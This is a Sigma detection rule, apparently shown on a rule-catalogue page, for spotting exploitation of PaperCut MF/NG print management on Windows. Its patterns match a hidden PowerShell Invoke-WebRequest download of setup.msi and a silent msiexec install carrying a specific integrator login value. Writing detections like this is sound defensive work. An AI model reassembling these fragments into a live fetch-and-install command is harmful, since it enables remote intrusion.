PaperCut MF/NG Exploitation Related Indicators

Detects exploitation indicators related to PaperCut MF/NG Exploitation

Sigma rule (View on GitHub)

 1title: PaperCut MF/NG Exploitation Related Indicators
 2id: de1bd0b6-6d59-417c-86d9-a44114aede3b
 3status: test
 4description: Detects exploitation indicators related to PaperCut MF/NG Exploitation
 5references:
 6    - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software
 7    - https://www.papercut.com/kb/Main/PO-1216-and-PO-1219
 8author: Nasreddine Bencherchali (Nextron Systems)
 9date: 2023-04-25
10tags:
11    - attack.execution
12    - detection.emerging-threats
13logsource:
14    category: process_creation
15    product: windows
16detection:
17    selection_1:
18        CommandLine|contains|all:
19            - ' /c '
20            - 'powershell'
21            - '-nop -w hidden'
22            - 'Invoke-WebRequest'
23            - 'setup.msi'
24            - '-OutFile'
25    selection_2:
26        CommandLine|contains|all:
27            - 'msiexec '
28            - '/i '
29            - 'setup.msi '
30            - '/qn '
31            - 'IntegratorLogin=fimaribahundq'
32    condition: 1 of selection_*
33falsepositives:
34    - Unlikely
35level: high

References

Related rules

to-top